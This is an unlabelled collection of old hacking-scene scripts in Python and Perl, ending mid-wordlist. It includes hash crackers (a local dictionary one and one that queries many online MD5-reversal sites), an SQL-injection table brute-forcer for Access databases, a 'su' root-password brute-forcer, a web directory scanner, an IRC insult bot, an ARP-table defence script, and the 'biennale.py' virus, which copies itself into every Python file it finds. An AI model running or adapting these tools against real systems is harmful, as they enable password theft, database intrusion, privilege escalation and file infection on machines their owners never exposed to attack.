#!/usr/bin/env python

import md5, sys, hashlib

def main():
	if len(sys.argv) == 4:
		if sys.argv[1] == '-e':
			encriptar()
		else:
			uso()
	elif len(sys.argv) == 5:
		if sys.argv[1] == '-c':
			crakeo()
		else:
			uso()
	else:
		uso()

def uso():
	print "Encriptador y crakeador:"
	print "Forma de uso:"                
	print "Para encriptar: %s y -e -opcion palabra" % sys.argv[0]
	print "Para crakear: python %s -c -opcion hash diccionario.txt" % sys.argv[0]
	print "opciones: -md5 || -sha1"
	print "Kalith: Kalith.9[at]gmail[dot]com"
	print "http://0x59.es"

def crakeo():
	a = False
	hash= sys.argv[3]
	try:
		dicc= open((sys.argv[4]), 'r')
		if sys.argv[2] == '-md5':
			crak_md5(a, hash, dicc)
		elif sys.argv[2] == '-sha1':
			crak_sha1(a, hash, dicc)
		else:
			uso()
	except IOError:
		print "Debe ser un archivo de texto valido... verificalo porfavor"
			
def crak_md5(a, hash, dicc):
	if len(hash) == 32:
		print "El hash esta siendo crakeado... espera porfavor.."
		for i in dicc.read().split():
			PalabraEn= md5.new(i).hexdigest()
			if PalabraEn==hash:
				print "%s es el producto encriptado de %s" % (hash, i)
				a= True
				break
		if not a:
			print "El hash no se pudo crakear..."
		dicc.close()
	else:
		print "Debe estar en md5"
	
def crak_sha1(a, hash, dicc):
	if len(hash) == 40:
		print "El hash esta siendo crakeado... espera porfavor.."
		for i in dicc.read().split():
			PalabraEn= hashlib.sha1(i).hexdigest()
			if PalabraEn==hash:
				print "%s es el producto encriptado de %s" % (hash, i)
				a= True
				break
		if not a:
			print "El hash no se pudo crakear..."
		dicc.close()
	else:
		print "Debe estar en sha1.."

def encriptar():
	if sys.argv[2] == '-md5':
		print encr_md5()
	elif sys.argv[2] == '-sha1':
		print encr_sha1()
	else:
		uso()

def encr_md5():
	return "El resultado es: %s" % md5.new(sys.argv[3]).hexdigest()
	
def encr_sha1():
	return "El resultado es: %s" % hashlib.sha1(sys.argv[3]).hexdigest()

main()

#!/usr/bin/env python

# This is a just for fun experiment bot to learn how IRC works
# My name is Andre and I go by the handle Tr1pX
# Feel free to contact me floridait[--at--]gmail[---dot---]com
# This bot was tested on irc.bluehell.org

import sys
import socket
import string
import time
import os # when I use this import in linux it works but you might have to change it for winblows

# here are our connection variables
HOST="irc.bluehell.org"
PORT=6667
REALNAME="Ceasar"
# the readbuffer stores all the data the server send to us
readbuffer=""
# here we give the bot a name
try:
nickname = sys.argv[1]

print "[+] Joining with name "+nickname
except IndexError:
print '-This bot is designed for BlueHell-'
print '-----Please use xbot.py <nick>-----'
sys.exit()

CHAN='#bhf'
NICK=nickname
IDENT=NICK
# here we connect to the irc server
s=socket.socket( )
s.connect((HOST, PORT))
s.send("NICK %s\r\n" % NICK)
s.send("USER %s %s bla :%s\r\n" % (IDENT, HOST, REALNAME))
# here are some other variables that we need to set
BOTOWNER = 'Tr1pX'
things_to_say = ['Here\'s 20 cents. Call all your friends and bring back some change! ',
'Any similarity between you and a human is purely coincidental! ',
'Calling you stupid would be an insult to stupid people. ',
'Do you ever wonder what life would be like if you\'d had enough oxygen at birth? ',
'Do you want people to accept you as you are or do you want them to like you? ',
'Do you still love nature, despite what it did to you? ',
'Don\'t you need a license to be that ugly? ',
'Every person has the right to be ugly, but you abused the privilege! ',
'You are the kind of a man that you would use as a blueprint to build an idiot. ']
#here goes our functioning part


def ai (tmp):
msgstrip = tmp.rstrip().split(' ', 3) # seperate the message text from the rest
msgtrigger = msgstrip[3]
sender = msgstrip[0].strip(':').split('!')[0] #here we get the command givers name

# now we define what happens if we get certain words
if msgstrip[1] == "PRIVMSG" and msgstrip[2] == CHAN or NICK:
if msgtrigger == ':'+NICK+':':
print "[+] %s mentioned your name!" % sender #this is for output to the console the bot is running in
the_msg = ' I am busy right now! I\'ll brb '+sender
msg_sender(CHAN, the_msg) # remeber to put CHAN in there for the destination

if msgtrigger == ':lol':
print "[+] %s typed a known trigger" % sender
the_msg1 = sender+' is laughing out loud!'
msg_sender(CHAN, the_msg1) # remeber to put CHAN in there for the destination

if msgtrigger == ':hmm':
print "[+] %s typed a known trigger" % sender
the_msg2 = 'What are you thinking about so hard '+sender+'?'
msg_sender(CHAN, the_msg2) # remeber to put CHAN in there for the destination

if msgtrigger == ':hello':
print "[+] %s typed a known trigger" % sender
the_msg3 = 'Hello '+sender+'!'
msg_sender(CHAN, the_msg3) # remeber to put CHAN in there for the destination

if msgtrigger == ':lmao':
print "[+] %s typed a known trigger" % sender
the_msg5 = sender+' is laughing his a$$ off!'
msg_sender(CHAN, the_msg5)

# here we are going to write more functional commands
if msgtrigger == ':!change.name':
print "[+] %s gave the command to change the name" % sender
the_msg6 = 'OK! '+sender+', I will change my name now.'
msg_sender(CHAN, the_msg6)
recon_newnick(CHAN, sender)

if msgtrigger == ':!exit':
print "[+] %s gave me the command to exit" % sender
the_msg7 = 'OK! '+sender+', let me check if you have permission to turn me off.'
msg_sender(CHAN, the_msg7)
permission(CHAN, sender)

if msgtrigger == ':!commands':
print "[+] %s has requested a list of commands" % sender
the_msg8 = 'OK! '+sender+', here come my commands:'
msg_commands = '[1] !change.name [2] !commands [3] !exit [4] !op.me [5] !diss.me [#] More to come: '+sender
msg_sender(CHAN, the_msg8)
msg_sender(CHAN, msg_commands)

if msgtrigger == ':!op.me':
print "[+] %s wants me to give him op" % sender
the_msg9 = 'OK! '+sender+', let me see if I can give you Op status.'
msg_sender(CHAN, the_msg9)
give_op(CHAN, sender)

if msgtrigger == ':!diss.me':
print "[+] %s typed a known trigger" % sender
the_msg10 = 'Ok! '+sender+' the following apply to you!'
msg_sender(CHAN, the_msg10)
x = 0
for text in things_to_say:
x = x + 1
text = str(x) + '. ' + text
time.sleep(3)
msg_sender(CHAN, text)

# if msgtrigger == ':!create.army':
# print "[+] %s is trying to load more bots" % sender
# the_msg11 = 'OK! '+sender+', I am getting back-up now, are you sure? ~(!create.army!yes / !create.army!no)~'
# msg_sender(CHAN, the_msg11)
#
# if msgtrigger == ':!create.army!yes':
# print "[+] %s has confirmed that he wants more bots" % sender
# msg_yes = 'Ok! '+sender+', as you wish!'
# msg_sender(CHAN, msg_yes)
# more_bots()
#
# if msgtrigger == ':!create.army!no':
# print "[+] %s has canceled and wants no more bots"
# msg_no = 'OK! '+sender+', I have cancelled your request'
# msg_sender(CHAN, msg_no)

#def more_bots (): # this function does work but most irc servers have a host session limit
# b = 0 # so after 3 connects from one host they will be created but the old ones disconnect
# while b < 5: # here you can set the number of bots to enter
# time.sleep(5)
# b = b + 1
# os.popen('python soldier.py soldier'+str(cool.gif) # i dont know if this works in windows but it does in linux



def give_op (channel, commander): # this function allows the bot to give the botowner op only if
if commander == BOTOWNER: # the bot has op status though obviously
print "[+] %s is recordnized as a authorized user" % commander
s.send("MODE "+channel+' +o '+commander+'\r\n')
op_msg = commander+', if I had the power to OP you, then you should be OP now!'
msg_sender(channel, op_msg)
time.sleep(5) # most of these sleep commands just keep the bot from flooding
commander = ''

elif commander != BOTOWNER:
print "[+] %s has no authority for OP" % commander
denied_op_msg = 'I am sorry '+commander+', but you don\'t have permission to be OPed'
msg_sender(channel, denied_op_msg)
time.sleep(5)
commander = ''



def permission (channel, commander): # this function is to shut the bot down with !exit, it checks your nick
if commander == BOTOWNER : # or botowner variable to see if the commander is authorized
print "[+] Shutting down connection"
shutdown_msg = '[+]Shutting Down[+] Good Bye '+commander+'!'
msg_sender(channel, shutdown_msg)
s.send("PART \r\n")
time.sleep(5)
sys.exit()

elif commander != BOTOWNER:
print "[+] %s has no proper authority!" % commander
denied_msg = '[+]Shut down denied[+] '+commander+' has no authority!'
msg_sender(channel, denied_msg)
time.sleep(5)
commander = ''


def recon_newnick (channel, commander): # this function lets you command the bot to change its name to yournicks_p3t
s.send("PART \r\n")
s.send("NICK "+commander+'s_p3t \r\n')
s.send("JOIN "+channel+'\r\n')

time.sleep(10)
confirm_msg = 'I changed my name '+commander+', like you wanted me to.'
msg_sender(channel, confirm_msg)

commander = '' # we have to clear commander to avoid errors like wrong sender or multiple


def msg_sender (destination, message): # this is the communicator, it sends all messages to irc for processing
s.send("PRIVMSG "+destination+" :"+message+"\r\n")
time.sleep(5)
message = '' # we have to make sure that message is empty before getting another trigger

def connect_to_channel (check): # I wrote this function to make the bot run smoother by not always running the same
try: # loop over and over trying to connect to the same channel
connected = check.rstrip().split(' ', 3)
are_we_con = connected[2]
if are_we_con != CHAN: # check to see if we already joined the channel
s.send('JOIN '+CHAN+'\r\n') #here we connect to the channel
except IndexError:
print "[+] Ideling"
#here ends our function

while 1: # this is our connection loop
readbuffer=readbuffer+s.recv(1024) # here we get data no more than 1024 bytes
chan_check = readbuffer # here i set up a test variable to search for data
connect_to_channel(chan_check) # here i call my connection function
if readbuffer.find('PRIVMSG') != -1: # here we get the data ready for processing for the ai() function
ai(chan_check) # this sends all data to the ai() function so it recorgnizes the triggers
temp=string.split(readbuffer, "\n")
readbuffer=temp.pop( ) # remove our last line to get room for the next
for line in temp:
line=string.rstrip(line)
line=string.split(line)
print "[+] %s" % line # this line helps me right my other function to see some output

if(line[0]=="PING"): # every bot needs to tell IRC that they are alive here
s.send("PONG %s\r\n" % line[1])

import sys
import os
import urllib

from urllib import urlopen

os.system("cls")
print "Access Table Brute v1 Written by nova"
print "-------------------------------------"
print
print "Usage: access-brute.py url"
print "Eg. access-brute.py http://host.com/viewproduct.asp?id=1+union+select+1+From+\n"

url = sys.argv[1]
substring = "The number of columns in the two selected tables or queries of a union query do not match"

print url
print
print "Tables:\n"
print "-------"


f = open("tester.txt",'r')
for line in f:
        
        
        
        feeddata = urllib.urlopen(url+line).read()
              
        s = feeddata
        x = s.count(substring)
        if (x > 0):
            print line

print "-------------"
print "scan complete"

admin
users
customers
customer
members
clients
tblusers
tbluser
ordermain
orders
sales
stores
titles
msysobjects
MSysAccessObjects
MSysAccessXML
MSysACEs
MSysQueries
MSysRelationships
Northwind
wtblObjectList

# biennale.py ________________ go         to _____ 49th Biennale di Venezia
# HTTP://WWW.0100101110101101.ORG __ + __ [epidemiC] http://www.epidemic.ws
from dircache import *
from string import *
import os, sys
from stat import *

def fornicate(guest):
    try:
        soul = open(guest, "r")
        body = soul.read()
        soul.close()
        if find(body, "[epidemiC]") == -1:
            soul = open(guest, "w")
            soul.write(mybody + "\n\n" + body)
            soul.close()
    except IOError: pass        

def chat(party, guest):
    if split(guest, ".")[-1] in ("py", "pyw"):
        fornicate(party + guest)

def join(party):
    try:
        if not S_ISLNK(os.stat(party)[ST_MODE]):
            guestbook = listdir(party)
            if party != "/": party = party + "/"
            if not lower(party) in **** and not "__init__.py" in guestbook:
                for guest in guestbook:
                    chat(party, guest)
                    join(party + guest)
    except OSError: pass
        
if __name__ == '__main__':
        mysoul = open(sys.argv[0])
        mybody = mysoul.read()
        mybody = mybody[:find(mybody, "#"*3) + 3]
        mysoul.close()
        blacklist = replace(split(sys.exec_prefix,":")[-1], "\\", "/")
        if blacklist[-1] != "/": blacklist = blacklist + "/"
        **** = [lower(blacklist), "/proc/", "/dev/"]
        join("/")
        print ">      This file was contaminated by biennale.py, the world slowest virus."
        print "Either Linux or Windows, biennale.py is definetely the first Python virus."
        print "[epidemiC] http://www.epidemic.ws __ + __ HTTP://WWW.0100101110101101.ORG "
        print "> ______________________ 49th Biennale di Venezia ______________________ <"
###

#!/usr/bin/python

import sys, os, time, this



def AntiArp(Argument):

    print "Working ...nPress CTRL+C to Quit"

    while 1:

        f , a , b = open(Argument,'r') , 0 , 0

        for lines in f:

            a = a+1

        f.seek(0)

        while b < a :

            mot = f.readline().rstrip()

            d = mot.index(" ")

            f , e = mot[:d] , mot[d+1:]

            os.system("arp -d *")

            print "deleting arp table"

            cmd = "arp -s %s " %f  + e

            print cmd

            os.system(cmd)

            b+=1

            time.sleep(10)



try:

    if len(sys.argv) < 2:

       print "nUsage : %s <cache-file>" % sys.argv[0]

       print "<cache-file> where data is : x.x.x.x [MAC Address]"

    else:

        AntiArp(sys.argv[1])

except KeyboardInterrupt:

    print "Stopped"

#!/usr/bin/python
#Local Root BruteForcer

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import sys
try:
    import pexpect
except(ImportError):
    print "\nYou need the pexpect module."
    print "http://www.noah.org/wiki/Pexpect\n"
    sys.exit(1)

#Change this if needed.
LOGIN_ERROR = 'su: incorrect password'

def brute(word):
    print "Trying:",word
    child = pexpect.spawn ('su')
    child.expect ('Password: ')
    child.sendline (word)
    i = child.expect (['.+\s#\s',LOGIN_ERROR])
    if i  == 0:
        print "\n\t[!] Root Password:",word
        child.sendline ('whoami')
        print child.before
        child.interact()
    #if i == 1:
        #print "Incorrect Password"

if len(sys.argv) != 2:
    print "\nUsage : ./rootbrute.py <wordlist>"
    print "Eg: ./rootbrute.py words.txt\n"
    sys.exit(1)

try:
    words = open(sys.argv[1], "r").readlines()
except(IOError):
      print "\nError: Check your wordlist path\n"
      sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] BruteForcing...\n"
for word in words:
    brute(word.replace("\n",""))

#!usr/bin/perl

# NOTA:
# NO ME HAGO RESPONSABLE POR EL USO
# QUE LE DEN AL PROGRAMA, EL USUARIO
# ES EL QUE SE HACE RESPONSABLE.
# SaLuDos :) [by W4rL0cK] (Algunos derechos reservados) 2oo8 [C]
#
#      Ultima actualizacion: 17.Marzo.2008

use strict;
use LWP::UserAgent;
use HTTP::Request qw(post);

my $hash = shift || &banner();
my $agent = "Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)";

sub banner {
print "\n";
print "MD5 CRACKER\n";
print "\n";
print "perl x.pl <hash>\n";
print "perl x.pl eec4832f1db196790d523a4ab628a899\n";
print "\n";
exit;
}

sub banner2 {
print "\n";
print "MD5 CRACKER\n";
print "\n";
print "[+] Comprobando el hash: $hash\n";
&comprobarhash($hash);
print "[+] Buscando .. \n";
}

sub comprobarhash {
$hash=shift(@_);
if (length($hash)==32) {
print "[+] Hash correcto\n";
} else {
print "[-] Hash invalido\n";
print "[x] Saliendo\n";
exit;
}
}

&banner2();
&cracker0($hash,$agent);
&cracker1($hash,$agent);
&cracker2($hash,$agent);
&cracker3($hash,$agent);
&cracker4($hash,$agent);
&cracker5($hash,$agent);
&cracker6($hash,$agent);
&cracker8($hash,$agent);
&cracker9($hash,$agent);
&cracker10($hash,$agent);
&cracker11($hash,$agent);
&cracker12($hash,$agent);
&cracker13($hash,$agent);
&cracker14($hash,$agent);
&cracker15($hash,$agent);
&cracker7($hash,$agent);
&cracker16($hash,$agent);
&cracker17($hash,$agent);
&cracker18($hash,$agent);

#busca en md5.thekaine.de
sub cracker1 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://md5.thekaine.de/?hash=$hash";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $code1 = "<td colspan=\"2\"><br><br><b>";
my $code2 = "</b></td><td></td>";
print "md5.thekaine.de          |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
if ($resultado->content =~ /not found/) {
print "Not Found\n";
} else {
print "Cracked: $1\n";
}
} else {
print "Not Found\n";
}
}

#busca en nz.md5.crysm.net
sub cracker2 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://nz.md5.crysm.net/find?md5=$hash";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $code1 = "<li>";
my $code2 = "</li>";
print "nz.md5.crysm.net         |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en www.tydal.nu/php/sakerhet/
sub cracker3 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://www.tydal.nu/php/sakerhet/md5.php?q=$hash";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $code1 = "";
my $code2 = "</b></h5>";
print "www.tydal.nu             |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
if ($resultado->content =~ /Ingen/) {
print "Not Found\n";
} else {
print "Cracked: $1\n";
}
} else {
print "Not Found\n";
}
}

#busca en www.milw0rm.com/cracker
sub cracker4 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://milw0rm.com/cracker/search.php";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["hash" => $hash, "Submit" => "Submit"]); 
my $content = $request->content; 

my $code1 = "</TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>";
my $code2 = "</TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>cracked</TD></TR>";
print "www.milw0rm.com          |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en gdataonline.com
sub cracker5 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://gdataonline.com/qkhash.php?mode=txt&hash=$hash";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $code1 = "</td><td width=\"35%\"><b>";
my $code2 = "</b></td></tr>";
print "gdataonline.com          |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en www.csthis.com
sub cracker6 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://www.csthis.com/md5/index.php";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["h" => $hash]); 
my $content = $request->content; 

my $code1 = "resolves to:<br /><b><font color=#00CC66 size=6>";
my $code2 = "</b></font></font>  </p>";
print "www.csthis.com           |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en md5decrypter.com
sub cracker0 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://md5decrypter.com/index.php";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["hash" => $hash, "submit" => "Decrypt!"]); 
my $content = $request->content; 

my $code1 = "<br/><b class='red'>Normal Text: </b>";
my $code2 = "";
print "md5decrypter.com         |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en plain-text.info
sub cracker7 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://plain-text.info/search/";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
$conexion->default_header('Host' => "plain-text.info", 'Connection' => "close", 'Accept-Encoding' => "base64", 'Accept' => "text/plain", 'Accept-Language' => "es", 'Referer' => "http://plain-text.info/search/", 'Content-type' => "application/x-www-form-urlencoded");
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["searchhash" => $hash]); 
my $content = $request->content; 

my $code1 = "<td>$hash</td>";
my $code2 = "<td>cracked</td>";
print "plain-text.info          |   ";
if ($request->content =~ m/$code1(.*)$code2/s) {
my $cx1 = "<td>";
my $cx2 = "</td>";
if($1 =~ m/$cx1(.*)$cx1/s) {
my $longstrx = index($1,$cx2);
my $hashstrx = substr($1,0,$longstrx);
print "Cracked: $hashstrx\n";
}
} else {
print "Not Found\n";
}
}

#busca en md5pass.info
sub cracker8 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://md5pass.info/index.php";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["hash" => $hash, "get_pass" => "Get Pass"]); 
my $content = $request->content; 

my $code1 = "Password - <b>";
my $code2 = "</b>";
print "md5pass.info             |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en md5.hashcracking.com
sub cracker9 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://md5.hashcracking.com/search.php?md5=$hash";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $code1 = "Cleartext of $hash is ";
my $code2 = "";
print "md5.hashcracking.com     |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en md5decryption.com
sub cracker10 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://md5decryption.com";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["hash" => $hash, "submit" => "Decrypt It!"]); 
my $content = $request->content; 

my $code1 = "<h2>Results</h2><b>Md5 Hash:</b> $hash<br/><b class='red'>Normal Text: </b>";
my $code2 = "<br/>";
print "www.md5decryption.com    |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en md5.xpzone.de
sub cracker11 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://md5.xpzone.de/?string=$hash&mode=decrypt";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $code1 = "Code: <b>";
my $code2 = "</b><br>";
print "md5.xpzone.de            |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en us.md5.crysm.net
sub cracker12 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://us.md5.crysm.net/find?md5=$hash";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $code1 = "<li>";
my $code2 = "</li>";
print "us.md5.crysm.net         |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en www.hashreverse.com
sub cracker13 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://www.hashreverse.com/index.php?action=view";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["hash" => $hash, "convert" => "false", "Submit2" => "Search for a SHA1 or MD5 hash"]); 
my $content = $request->content; 

my $code1 = "Following results were found:<br><ul><li>";
my $code2 = "</li></ul>";
print "www.hashreverse.com      |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en www.neeao.com
sub cracker14 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://www.neeao.com/md5/index.asp";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["q" => $hash, "b" => "MD5-Search"]); 
my $content = $request->content; 

my $code1 = "</div>Result:";
my $code2 = "    Good Luck!<br />";
print "www.neeao.com            |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en www.hashchecker.com
sub cracker15 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://www.hashchecker.com/index.php";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["search_field" => $hash, "Submit" => "search"]); 
my $content = $request->content; 

my $code1 = "<td><li>Your md5 hash is :<br><li>$hash is <b>";
my $code2 = "</b> used charlist :2</td>";
print "www.hashchecker.com      |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en victorov.su/md5/
sub cracker16 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://victorov.su/md5/?md5e=&md5d=$hash";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $code1 = "MD5 i°i ñi¸i¨i´i°i®i¢i i­: <b>";
my $code2 = "</b><br><form action=\"\">";
print "victorov.su              |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en securitystats.com/tools
sub cracker17 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://securitystats.com/tools/hashcrack.php";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["inputhash" => $hash, "type" => "MD5", "Submit" => "Submit"]); 
my $content = $request->content; 

my $code1 = "<font color=\"#FF0000\"><B><BR><BR>MD5 Hash Found!!</font></b><BR>".uc($hash)." = ";
my $code2 = "</td>";
print "securitystats.com        |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en md5crack.it-helpnet.de
sub cracker18 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://md5crack.it-helpnet.de/index.php?op=search";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["md5" => $hash, "submit" => "Search now"]); 
my $content = $request->content; 

my $code1 = "</td><td>$hash</td><td>";
my $code2 = "</td>";
print "md5crack.it-helpnet.de   |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
if (length($1)==23) {
print "Not Found\n";
} else {
print "Cracked: $1\n";
}
} else {
print "Not Found\n";
}
}

#!/usr/bin/perl

#

#bY boER

use LWP::UserAgent;

my $ua = LWP::UserAgent->new();

$ua->timeout(10);

$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");

unless($ARGV[0]){

	OUT("#############################################\n");

	OUT("\n Usage: perl $0 website\n");

	OUT("\n#############################################\n");

	exit(0);

}

if($^O =~ /Win/){

	system("cls");

}else{

	system("clear");

}

OUT("#############################################\n");

OUT("        Scanner Directory!\n");

OUT("#############################################\n");

OUT(" 200 - OK\n");

OUT(" 401 - Authorization Required\n");

OUT(" 403 - Forbidden\n");

OUT(" 500 - Bad Hostname | Internal Server Error\n");

OUT("#############################################\n");

$webcl = clear($ARGV[0]);

OUT("\n# Scanning: $webcl\n\n");

brute($webcl);

OUT("\n# Scanning Finished\n");

sub brute{

	$web = shift;

	@paths = ("access","active","adm","admin","_admin","administrator",

	"administracion","_administracion","~administracion","administer",

	"upload","uploads","~adm","~admin","~administrator","~guest","~mail",

	"~operator","~root","~sys","~sysadm","~sysadmin","~test","~user","~www",

	"~webmaster","admin_upload","admin_uploadpic","editpassword",

	"manager_userinfo","manager_tongji","managerenter","incupfile","inc",

	"upfile","admin_index","admin_admin","index_admin","index","admindefault",

	"default","manage","login","manage_index","index_manage","admin1",

	"admin_login","login_admin","ad_login","ad_manage","count","manager",

	"adminlogin","adminuserlogin","adm_login","chklogin","adduser","adminuser",

	"admin_user","edituser","adminadduser","adminmember","addmember","adminedit",

	"admin_edit","up","upfiles","aadmin","admintab","admin_main","fileadmin",

	"databases","includeinc","***","app","apacheasp","apps","archive","archives",

	"asp","back","backup","back-up","bak","bakup","bak-up","basic","bea","bin",

	"binaries","broken","c","cc","connections","ccs","cache","cgi","fcgi",

	"cgibin","cgi-win","class","classes","classified","classifieds","code",

	"common","credit","creditcards","cv","cvs","customer","customers",

	"CYBERDOCS","CYBERDOCS25","CYBERDOCS31","d","dfiles","data","database",

	"db","dbase","dbm","dbms","demo","dev","devel","develop","development",

	"doc","docs","docs41","docs51","dms","e","email","downloads","ecommerce",

	"ebriefs","error","errors","esales","echannel","esupport","etc","exec",

	"executable","executables","extra","extranet","examples","exchange",

	"fcgi-bin","functions","feedback","file","files","forum","forums","ftp",

	"graphics","galeria","gallery","galerias","guestbook","guests","help",

	"hidden","hide","home","homes","htm","html","imagen","images","icons",

	"incs","include","includes","interactive","internet","intranet","java",

	"javascript","js","jsp","keep","kept","ldap","lib","libs","libraries",

	"links","log","logfiles","logs","lightbox2","mail","me","members","mine",

	"mirror","mirrors","mp3","mp3s","ms","mssql","ms-sql","music","my","new",

	"old","online","order","orders","pages","_pages","pass","passes","passwd",

	"password","polls","passwords","perl","personal","personals","php","_php",

	"phpincludes","pics","pl","pls","plx","press","priv","private","products",

	"production","pub","public","removed","reports","root","sales","save",

	"saved","scripts","secret","secrets","security","servlet","servlets",

	"soap","soapdocs","source","site","sites","SiteServer","sql","src",

	"staff","stats","statistics","ssi","stuff","support","temp","temps","test",

	"text","texts","tmp","user","users","var","vb","vbs","vbscript","vbscripts",

	"weblogic","www","xcache","xsql","zip","zips","W3SVC","W3SVC3","index.php",

	"index.html","phpmyadmin","phpMyAdmin",".bash_history","upload.php",

	"upload.asp","uploader.php","uploader.asp","phpinfo.php","_banners",

	"_adv","468","88","ads","adv","ban","baners","bann","banner","banners",

	"bannerz","be","begun","bn","bnr","cnstats","cnt","phpadsnew","server-status",

	"server-info",".server-status",".server-info",".passwd","INSTALL","_vti_log",

	"admcgi","_notes","_tmp","_temp","panel","_panel","~panel","upFiles","img",

	"es","css","socios","Documentation","INSTALLsetup.php","Upfile","cgi-bin",

	"content","secure","mysql","4Dbin","trustscn_pdos","trustscn_pdos1","_vti_bin",

	"Connections","_mmServerScripts","bot","imag","lobatos","phpmyadm","Phpmyadmin",

	"PhpMyAdmin","PhpGAdmin","PhpInclude","PhpIncludes","phpscripts","PhpScripts",

	"_vti_txt","cgi-local","cgis","WS_FTP.LOG","User.php","Upload.php","AlbumDB.php",

	"add_comment.php","add_photo.php","admin.php","adm.php","adm.asp","admin.asp","main",

	"web","global","globals","uploader","logon","sign","signin","example","update",

	"readme","client","clients","cmd","logfile","details","shtml","asa","jsa",

	"txt","cfm","sav","nsf","bat","com","exe","dll","reg","tar","tar.gz","tgz",

	"o","sh","member","auth","login.php","user.php","admin.php~","members.php",

	"members.php~","configuration.php~","config.php~","Setting.php~","Settings.php~",

	"Settings_bak.php~","Setting_bak.php~","config-bak.php~","member.php","users.php",

